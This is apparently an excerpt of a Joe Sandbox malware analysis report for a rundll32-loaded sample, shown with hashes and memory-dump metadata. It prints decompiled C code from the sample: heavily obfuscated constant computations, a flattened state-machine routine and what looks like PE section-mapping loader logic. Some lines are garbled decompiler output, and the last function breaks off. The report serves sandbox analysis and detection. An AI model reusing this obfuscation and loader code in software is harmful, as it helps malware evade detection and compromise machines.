                                                                                                                      0x0034f7a0
                                                                                                                      0x0034f858
                                                                                                                      0x0034f858
                                                                                                                      0x0034f85e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034f85e
                                                                                                                      0x0034f7b3
                                                                                                                      0x0034f7bc
                                                                                                                      0x0034f7be
                                                                                                                      0x00000000
                                                                                                                      0x0034f7be
                                                                                                                      0x0034f83a
                                                                                                                      0x0034f83f
                                                                                                                      0x0034f841
                                                                                                                      0x0034f844
                                                                                                                      0x0034f847
                                                                                                                      0x0034f853
                                                                                                                      0x00000000
                                                                                                                      0x0034f853
                                                                                                                      0x0034f849
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k7D$l($rk$,I
                                                                                                                      • API String ID: 0-1943337972
                                                                                                                      • Opcode ID: 108d1846da2b3672ebb1fd69a9040d88fa0e2199f865efb73282afcadcc385d0
                                                                                                                      • Instruction ID: ed00d25200880d8fb32f9cef608a147490c40e24e1a953244ad5864e08800f1b
                                                                                                                      • Opcode Fuzzy Hash: 108d1846da2b3672ebb1fd69a9040d88fa0e2199f865efb73282afcadcc385d0
                                                                                                                      • Instruction Fuzzy Hash: 30718AB15083019FC768CE28C58985FBBF1FBC4758F544A2EF6969A260C7B49909CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00358D71 Relevance: 5.1, Strings: 4, Instructions: 135COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00358D71(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t119;
				void* _t128;
				void* _t138;
				void* _t140;
				signed int _t142;
				signed int _t143;
				void* _t158;
				void* _t163;
				signed int* _t167;
				signed int* _t168;
				signed int* _t169;

				_t165 = _a12;
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t119);
				_v4 = _v4 & 0x00000000;
				_v12 = 0xd63ca;
				_v8 = 0x2a80fb;
				_v32 = 0xd656a7;
				_t142 = 0x2a;
				_v32 = _v32 * 0x76;
				_v32 = _v32 ^ 0x62cbe0fa;
				_v60 = 0xd42ea;
				_v60 = _v60 | 0xae184de3;
				_v60 = _v60 * 0x64;
				_v60 = _v60 ^ 0xa1370c8b;
				_v60 = _v60 ^ 0xa2441b47;
				_v28 = 0x613a22;
				_v28 = _v28 + 0xe1cd;
				_v28 = _v28 ^ 0x00621baf;
				_v48 = 0x1555f7;
				_v48 = _v48 | 0xf97f7abf;
				_v48 = _v48 ^ 0xf978b226;
				_v36 = 0xa4495c;
				_v36 = _v36 << 0xc;
				_v36 = _v36 ^ 0x449a63ff;
				_v64 = 0xc77e0d;
				_v64 = _v64 * 0x7d;
				_v64 = _v64 << 3;
				_v64 = _v64 / _t142;
				_v64 = _v64 ^ 0x0042e8ad;
				_v24 = 0xcd3d37;
				_v24 = _v24 ^ 0xb946add1;
				_v24 = _v24 ^ 0xb982581d;
				_v40 = 0xe4266b;
				_v40 = _v40 << 9;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x064c7215;
				_v44 = 0x9ee2d0;
				_v44 = _v44 + 0xdca1;
				_v44 = _v44 ^ 0x9755f080;
				_v44 = _v44 ^ 0x97c96657;
				_v20 = 0xa48706;
				_v20 = _v20 | 0xe10b6776;
				_v20 = _v20 ^ 0xe1a97c21;
				_v56 = 0x583a03;
				_v56 = _v56 * 0x56;
				_v56 = _v56 + 0x9dad;
				_v56 = _v56 * 0x55;
				_v56 = _v56 ^ 0xd77aa722;
				_v52 = 0xf9a5b4;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffff4c61;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x033f85cc;
				_v16 = 0x1cccaa;
				_v16 = _v16 + 0x745b;
				_v16 = _v16 ^ 0x0015a734;
				_t143 = _v48;
				_t128 = E0035BE0B(_t143, _v36, _v64, _a12);
				_t138 = _t128;
				_t167 =  &(( &_v64)[8]);
				if(_t138 != 0) {
					_push(_t143);
					_t158 = E0034B0DA(_v24, _v40,  *((intOrPtr*)(_t138 + 0x50)), _v28, _v44, _v60 | _v32);
					_t168 =  &(_t167[5]);
					if(_t158 == 0) {
						L6:
						return _t158;
					}
					E0035FD29( *_t165, _v20, _t158, _v56,  *((intOrPtr*)(_t138 + 0x54)));
					_t169 =  &(_t168[3]);
					_t163 = ( *(_t138 + 0x14) & 0x0000ffff) + 0x18 + _t138;
					_t140 = ( *(_t138 + 6) & 0x0000ffff) * 0x28 + _t163;
					while(_t163 < _t140) {
						_t136 =  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10));
						E0035FD29( *((intOrPtr*)(_t163 + 0x14)) +  *_t165, _v52,  *((intOrPtr*)(_t163 + 0xc)) + _t158, _v16,  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10)));
						_t169 =  &(_t169[3]);
						_t163 = _t163 + 0x28;
					}
					goto L6;
				}
				return _t128;
			}






























                                                                                                                      0x00358d76
                                                                                                                      0x00358d7a
                                                                                                                      0x00358d7c
                                                                                                                      0x00358d7d
                                                                                                                      0x00358d81
                                                                                                                      0x00358d85
                                                                                                                      0x00358d86
                                                                                                                      0x00358d87
                                                                                                                      0x00358d8c
                                                                                                                      0x00358d93
                                                                                                                      0x00358d9b
                                                                                                                      0x00358da3
                                                                                                                      0x00358db2
                                                                                                                      0x00358db4
                                                                                                                      0x00358db8
                                                                                                                      0x00358dc0
                                                                                                                      0x00358dc8
                                                                                                                      0x00358dd5
                                                                                                                      0x00358dd9
                                                                                                                      0x00358de1
                                                                                                                      0x00358de9
                                                                                                                      0x00358df1
                                                                                                                      0x00358df9
                                                                                                                      0x00358e01
                                                                                                                      0x00358e09
                                                                                                                      0x00358e11
                                                                                                                      0x00358e19
                                                                                                                      0x00358e21
                                                                                                                      0x00358e26
                                                                                                                      0x00358e2e
                                                                                                                      0x00358e3b
                                                                                                                      0x00358e3f
                                                                                                                      0x00358e4a
                                                                                                                      0x00358e4e
                                                                                                                      0x00358e56
                                                                                                                      0x00358e5e
                                                                                                                      0x00358e66
                                                                                                                      0x00358e6e
                                                                                                                      0x00358e76
                                                                                                                      0x00358e7b
                                                                                                                      0x00358e80
                                                                                                                      0x00358e88
                                                                                                                      0x00358e90
                                                                                                                      0x00358e98
                                                                                                                      0x00358ea0
                                                                                                                      0x00358ea8
                                                                                                                      0x00358eb0
                                                                                                                      0x00358eb8
                                                                                                                      0x00358ec0
                                                                                                                      0x00358ecd
                                                                                                                      0x00358ed1
                                                                                                                      0x00358ede
                                                                                                                      0x00358ee2
                                                                                                                      0x00358eea
                                                                                                                      0x00358ef2
                                                                                                                      0x00358ef7
                                                                                                                      0x00358eff
                                                                                                                      0x00358f04
                                                                                                                      0x00358f0c
                                                                                                                      0x00358f14
                                                                                                                      0x00358f1c
                                                                                                                      0x00358f2c
                                                                                                                      0x00358f30
                                                                                                                      0x00358f35
                                                                                                                      0x00358f37
                                                                                                                      0x00358f3c
                                                                                                                      0x00358f4b
                                                                                                                      0x00358f65
                                                                                                                      0x00358f67
                                                                                                                      0x00358f6c
                                                                                                                      0x00358fc9
                                                                                                                      0x00000000
                                                                                                                      0x00358fcb
                                                                                                                      0x00358f7e
                                                                                                                      0x00358f87
                                                                                                                      0x00358f91
                                                                                                                      0x00358f96
                                                                                                                      0x00358fc4
                                                                                                                      0x00358fab
                                                                                                                      0x00358fb9
                                                                                                                      0x00358fbe
                                                                                                                      0x00358fc1
                                                                                                                      0x00358fc1
                                                                                                                      0x00000000
                                                                                                                      0x00358fc8
                                                                                                                      0x00358fd1

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ":a$[t$k&$B
                                                                                                                      • API String ID: 0-806590991
                                                                                                                      • Opcode ID: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction ID: 693e3dfa63d679ee942b863a3d7dbd234207291121e6add13105105a0cda6f27
                                                                                                                      • Opcode Fuzzy Hash: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction Fuzzy Hash: 375111B15083809FC354CF65C98691BFBF1BBC8748F409A1DF9996A220D7B5DA498F06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Locale$InfoThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4232894706-0
                                                                                                                      • Opcode ID: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction ID: 7f1c2cc19d32dc966023cfaeb6742e61450fd940bcfd9952f16cd7e7d576cf6d
                                                                                                                      • Opcode Fuzzy Hash: b3bb746828bfca1d75c361473fc7d4eb73e80cfcdae290e0792f670d5ca24456
                                                                                                                      • Instruction Fuzzy Hash: 4AF0C871E04238ABE715DBA489556EFB7E4EB09A81B11416CD981E7251EE206D0487C9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                      • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                      • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003545CD Relevance: 4.0, Strings: 3, Instructions: 258COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E003545CD(void* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				unsigned int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* __ecx;
				void* _t260;
				intOrPtr _t280;
				intOrPtr _t283;
				void* _t285;
				intOrPtr _t286;
				void* _t288;
				intOrPtr* _t291;
				void* _t293;
				intOrPtr _t310;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t317;
				void* _t318;

				_t291 = _a8;
				_t312 = _a4;
				_push(_t291);
				_push(_a4);
				_push(__edx);
				E0034CF25(_t260);
				_v16 = 0xeda856;
				_t310 = 0;
				_v12 = 0;
				_t318 = _t317 + 0x10;
				_v8 = 0;
				_v108 = 0x9530b9;
				_t293 = 0x1386c75;
				_v108 = _v108 + 0xffff8498;
				_v108 = _v108 + 0xffff62a2;
				_v108 = _v108 ^ 0x009417f2;
				_v72 = 0x4d29da;
				_v72 = _v72 | 0x3a723bc7;
				_v72 = _v72 ^ 0x3a7f3bde;
				_v68 = 0xbb7b0e;
				_v68 = _v68 | 0x90968cd5;
				_v68 = _v68 ^ 0x90bfffdf;
				_v32 = 0x962435;
				_v32 = _v32 << 9;
				_v32 = _v32 ^ 0x2c486a00;
				_v124 = 0x38cf9b;
				_t313 = 0x3a;
				_v124 = _v124 * 0x5b;
				_v124 = _v124 / _t313;
				_v124 = _v124 << 3;
				_v124 = _v124 ^ 0x02c91350;
				_v104 = 0xa200dd;
				_v104 = _v104 ^ 0x0aab722c;
				_v104 = _v104 + 0xffff0d17;
				_v104 = _v104 ^ 0x0a088008;
				_v136 = 0xa03782;
				_v136 = _v136 >> 4;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 + 0xffffdc54;
				_v136 = _v136 ^ 0xffffdc68;
				_v100 = 0xea2f66;
				_v100 = _v100 + 0xffffd1b3;
				_v100 = _v100 + 0xffff51f8;
				_v100 = _v100 ^ 0x00e840e3;
				_v132 = 0xadb516;
				_v132 = _v132 + 0xffff9028;
				_v132 = _v132 * 0x44;
				_v132 = _v132 + 0xffffe891;
				_v132 = _v132 ^ 0x2e08c107;
				_v140 = 0xeec816;
				_v140 = _v140 >> 7;
				_v140 = _v140 >> 0xf;
				_v140 = _v140 << 5;
				_v140 = _v140 ^ 0x000acf9f;
				_v116 = 0xb8b4c3;
				_v116 = _v116 + 0x5cf4;
				_v116 = _v116 + 0xffff9c7f;
				_v116 = _v116 ^ 0x00b90cd0;
				_v144 = 0x42ac99;
				_v144 = _v144 + 0xfffff6b6;
				_v144 = _v144 | 0xd26fea09;
				_v144 = _v144 + 0xcbeb;
				_v144 = _v144 ^ 0xd277b085;
				_v96 = 0x1bc5eb;
				_v96 = _v96 * 0x6c;
				_v96 = _v96 + 0x8f6c;
				_v96 = _v96 ^ 0x0bb05dde;
				_v48 = 0x1a2576;
				_v48 = _v48 * 0x64;
				_v48 = _v48 ^ 0x0a36ba39;
				_v88 = 0xc7f5d;
				_v88 = _v88 >> 4;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x00037446;
				_v84 = 0x3f34b5;
				_t314 = 0x5e;
				_v84 = _v84 * 0x31;
				_v84 = _v84 >> 0xe;
				_v84 = _v84 ^ 0x000d159a;
				_v120 = 0x5d4df8;
				_v120 = _v120 + 0xffffa239;
				_v120 = _v120 << 4;
				_v120 = _v120 ^ 0x05c58312;
				_v60 = 0x26932d;
				_v60 = _v60 / _t314;
				_v60 = _v60 ^ 0x000131ea;
				_v28 = 0x785747;
				_v28 = _v28 ^ 0x77c5d7dc;
				_v28 = _v28 ^ 0x77b818bc;
				_v56 = 0xd134ba;
				_t315 = 0x67;
				_v56 = _v56 * 7;
				_v56 = _v56 ^ 0x05bb4239;
				_v40 = 0xd9afd1;
				_v40 = _v40 * 0x25;
				_v40 = _v40 ^ 0x1f79b6d7;
				_v128 = 0x3f4f78;
				_v128 = _v128 / _t315;
				_v128 = _v128 | 0x7b2b5a07;
				_v128 = _v128 + 0xfffffa98;
				_v128 = _v128 ^ 0x7b2edba2;
				_v80 = 0xe956c4;
				_v80 = _v80 << 5;
				_v80 = _v80 ^ 0x1d2c49e8;
				_v64 = 0x3f3e0b;
				_v64 = _v64 * 5;
				_v64 = _v64 ^ 0x01394f8d;
				_v112 = 0xfc7f0a;
				_v112 = _v112 + 0xffff18e0;
				_v112 = _v112 + 0xffffa855;
				_v112 = _v112 ^ 0x00f14c19;
				_v92 = 0x78d624;
				_v92 = _v92 << 6;
				_v92 = _v92 + 0xffffec5c;
				_v92 = _v92 ^ 0x1e335a68;
				_v36 = 0xd9641a;
				_v36 = _v36 + 0xffff84de;
				_v36 = _v36 ^ 0x00d9de20;
				_v44 = 0x6f829b;
				_v44 = _v44 ^ 0xdbcb61d0;
				_v44 = _v44 ^ 0xdba9195b;
				_v52 = 0xea26f7;
				_v52 = _v52 + 0xffff0808;
				_v52 = _v52 ^ 0x00eef997;
				_v76 = 0xef1604;
				_v76 = _v76 + 0xfcdc;
				_v76 = _v76 + 0xffff9946;
				_v76 = _v76 ^ 0x00e2e7da;
				while(_t293 != 0x1386c75) {
					if(_t293 == 0x185c552) {
						_push(_t293);
						_push(_t293);
						_t280 = E00353512(_v20);
						_v24 = _t280;
						if(_t280 != 0) {
							_t293 = 0x84b6bf9;
							continue;
						}
					} else {
						if(_t293 == 0x1b7bba2) {
							E003468DE(_v36, _v44, _v52, _v76, _v24);
						} else {
							if(_t293 == 0x8150c28) {
								_t283 =  *0x365c9c; // 0x0
								_t285 = E0034AD30( *_t312, 0, _v100, _v132, _v140,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v68, _v108, _v32, _v116, _v144,  *((intOrPtr*)(_t283 + 0x50)), _t293, _t293, _v96, _v48, _v88);
								_t318 = _t318 + 0x40;
								if(_t285 == _v124) {
									_t293 = 0x185c552;
									continue;
								}
							} else {
								if(_t293 != 0x84b6bf9) {
									L13:
									if(_t293 != 0x3792bf2) {
										continue;
									} else {
									}
								} else {
									_t286 =  *0x365c9c; // 0x0
									_t222 =  &_v128; // 0xe840e3
									_t288 = E0034AD30( *_t312, _v24, _v28, _v56, _v40,  &_v20,  *((intOrPtr*)(_t312 + 4)), _v104, _v72, _v20,  *_t222, _v80,  *((intOrPtr*)(_t286 + 0x50)), _t293, _t293, _v64, _v112, _v92);
									_t318 = _t318 + 0x40;
									if(_t288 == _v136) {
										 *_t291 = _v24;
										_t310 = 1;
										 *((intOrPtr*)(_t291 + 4)) = _v20;
									} else {
										_t293 = 0x1b7bba2;
										continue;
									}
								}
							}
						}
					}
					return _t310;
				}
				_t293 = 0x8150c28;
				goto L13;
			}





















































                                                                                                                      0x003545d4
                                                                                                                      0x003545dd
                                                                                                                      0x003545e5
                                                                                                                      0x003545e6
                                                                                                                      0x003545e7
                                                                                                                      0x003545e9
                                                                                                                      0x003545ee
                                                                                                                      0x003545f9
                                                                                                                      0x003545fb
                                                                                                                      0x00354602
                                                                                                                      0x00354605
                                                                                                                      0x0035460e
                                                                                                                      0x00354616
                                                                                                                      0x0035461b
                                                                                                                      0x00354623
                                                                                                                      0x0035462b
                                                                                                                      0x00354633
                                                                                                                      0x0035463b
                                                                                                                      0x00354643
                                                                                                                      0x0035464b
                                                                                                                      0x00354653
                                                                                                                      0x0035465b
                                                                                                                      0x00354663
                                                                                                                      0x0035466e
                                                                                                                      0x00354676
                                                                                                                      0x00354681
                                                                                                                      0x00354690
                                                                                                                      0x00354691
                                                                                                                      0x0035469b
                                                                                                                      0x0035469f
                                                                                                                      0x003546a4
                                                                                                                      0x003546ac
                                                                                                                      0x003546b4
                                                                                                                      0x003546bc
                                                                                                                      0x003546c4
                                                                                                                      0x003546cc
                                                                                                                      0x003546d4
                                                                                                                      0x003546d9
                                                                                                                      0x003546de
                                                                                                                      0x003546e6
                                                                                                                      0x003546ee
                                                                                                                      0x003546f6
                                                                                                                      0x003546fe
                                                                                                                      0x00354706
                                                                                                                      0x0035470e
                                                                                                                      0x00354716
                                                                                                                      0x00354723
                                                                                                                      0x00354727
                                                                                                                      0x0035472f
                                                                                                                      0x00354737
                                                                                                                      0x0035473f
                                                                                                                      0x00354744
                                                                                                                      0x00354749
                                                                                                                      0x0035474e
                                                                                                                      0x00354756
                                                                                                                      0x0035475e
                                                                                                                      0x00354766
                                                                                                                      0x0035476e
                                                                                                                      0x00354776
                                                                                                                      0x0035477e
                                                                                                                      0x00354786
                                                                                                                      0x0035478e
                                                                                                                      0x00354796
                                                                                                                      0x0035479e
                                                                                                                      0x003547ab
                                                                                                                      0x003547af
                                                                                                                      0x003547b7
                                                                                                                      0x003547bf
                                                                                                                      0x003547cc
                                                                                                                      0x003547d2
                                                                                                                      0x003547da
                                                                                                                      0x003547e2
                                                                                                                      0x003547e7
                                                                                                                      0x003547ec
                                                                                                                      0x003547f4
                                                                                                                      0x00354803
                                                                                                                      0x00354806
                                                                                                                      0x0035480a
                                                                                                                      0x0035480f
                                                                                                                      0x00354817
                                                                                                                      0x0035481f
                                                                                                                      0x00354827
                                                                                                                      0x0035482c
                                                                                                                      0x00354834
                                                                                                                      0x00354844
                                                                                                                      0x00354848
                                                                                                                      0x00354850
                                                                                                                      0x0035485b
                                                                                                                      0x00354866
                                                                                                                      0x00354871
                                                                                                                      0x0035487e
                                                                                                                      0x0035487f
                                                                                                                      0x00354883
                                                                                                                      0x0035488b
                                                                                                                      0x00354898
                                                                                                                      0x0035489c
                                                                                                                      0x003548a4
                                                                                                                      0x003548b7
                                                                                                                      0x003548bb
                                                                                                                      0x003548c3
                                                                                                                      0x003548cb
                                                                                                                      0x003548d3
                                                                                                                      0x003548db
                                                                                                                      0x003548e8
                                                                                                                      0x003548f0
                                                                                                                      0x003548fd
                                                                                                                      0x00354901
                                                                                                                      0x00354909
                                                                                                                      0x00354911
                                                                                                                      0x00354919
                                                                                                                      0x00354921
                                                                                                                      0x00354929
                                                                                                                      0x00354931
                                                                                                                      0x00354936
                                                                                                                      0x0035493e
                                                                                                                      0x00354946
                                                                                                                      0x00354951
                                                                                                                      0x0035495c
                                                                                                                      0x00354967
                                                                                                                      0x0035496f
                                                                                                                      0x00354977
                                                                                                                      0x0035497f
                                                                                                                      0x00354987
                                                                                                                      0x0035498f
                                                                                                                      0x00354997
                                                                                                                      0x0035499f
                                                                                                                      0x003549a7
                                                                                                                      0x003549af
                                                                                                                      0x003549b7
                                                                                                                      0x003549c5
                                                                                                                      0x00354ad4
                                                                                                                      0x00354ad5
                                                                                                                      0x00354add
                                                                                                                      0x00354ae2
                                                                                                                      0x00354aed
                                                                                                                      0x00354aef
                                                                                                                      0x00000000
                                                                                                                      0x00354aef
                                                                                                                      0x003549cb
                                                                                                                      0x003549d1
                                                                                                                      0x00354b41
                                                                                                                      0x003549d7
                                                                                                                      0x003549dd
                                                                                                                      0x00354a72
                                                                                                                      0x00354aaf
                                                                                                                      0x00354ab4
                                                                                                                      0x00354abb
                                                                                                                      0x00354ac1
                                                                                                                      0x00000000
                                                                                                                      0x00354ac1
                                                                                                                      0x003549e3
                                                                                                                      0x003549e9
                                                                                                                      0x00354afe
                                                                                                                      0x00354b04
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00354b0a
                                                                                                                      0x003549ef
                                                                                                                      0x003549fb
                                                                                                                      0x00354a10
                                                                                                                      0x00354a48
                                                                                                                      0x00354a4d
                                                                                                                      0x00354a54
                                                                                                                      0x00354b15
                                                                                                                      0x00354b17
                                                                                                                      0x00354b1f
                                                                                                                      0x00354a5a
                                                                                                                      0x00354a5a
                                                                                                                      0x00000000
                                                                                                                      0x00354a5a
                                                                                                                      0x00354a54
                                                                                                                      0x003549e9
                                                                                                                      0x003549dd
                                                                                                                      0x003549d1
                                                                                                                      0x00354b55
                                                                                                                      0x00354b55
                                                                                                                      0x00354af9
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GWx$xO?$@
                                                                                                                      • API String ID: 0-2177883290
                                                                                                                      • Opcode ID: da99dae88e04b3d2f9995ec7ca26f0273188afa89b339b135914a4bcdb6348d1
                                                                                                                      • Instruction ID: ca2387531677ec0059875285fda3c37b385d26d98b92ce67491e947f1998fbdb
                                                                                                                      • Opcode Fuzzy Hash: da99dae88e04b3d2f9995ec7ca26f0273188afa89b339b135914a4bcdb6348d1
                                                                                                                      • Instruction Fuzzy Hash: 4CD10DB20083819FD769CF65C989A5BBBF1BBC4748F108A1DF6D986260D7B19948DF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0034E243 Relevance: 4.0, Strings: 3, Instructions: 256COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E0034E243() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _t246;
				signed int _t250;
				intOrPtr _t256;
				intOrPtr _t261;
				intOrPtr _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				intOrPtr _t277;
				void* _t300;
				char _t304;
				void* _t305;
				void* _t307;

				_v20 = 0x755bf0;
				_v16 = 0xbb5ee2;
				_v12 = 0xb403bb;
				_t262 = 0;
				_v8 = 0;
				_v108 = 0x84f903;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x00052a35;
				_v108 = _v108 + 0x3d3f;
				_v108 = _v108 ^ 0x3e47d87c;
				_v88 = 0x71c3c4;
				_v88 = _v88 + 0xffffe131;
				_t264 = 0x3b;
				_v88 = _v88 / _t264;
				_v88 = _v88 ^ 0x40aa9d70;
				_t300 = 0xfb124ba;
				_v88 = _v88 ^ 0x40a0f61c;
				_v52 = 0x7362f6;
				_v52 = _v52 | 0xb899219a;
				_v52 = _v52 ^ 0xb8f51d59;
				_v56 = 0xfd4e8c;
				_t265 = 0x71;
				_v56 = _v56 * 0x54;
				_v56 = _v56 ^ 0x53104169;
				_v92 = 0xd5c279;
				_v92 = _v92 + 0x8479;
				_v92 = _v92 + 0xffffbe38;
				_v92 = _v92 / _t265;
				_v92 = _v92 ^ 0x0004c231;
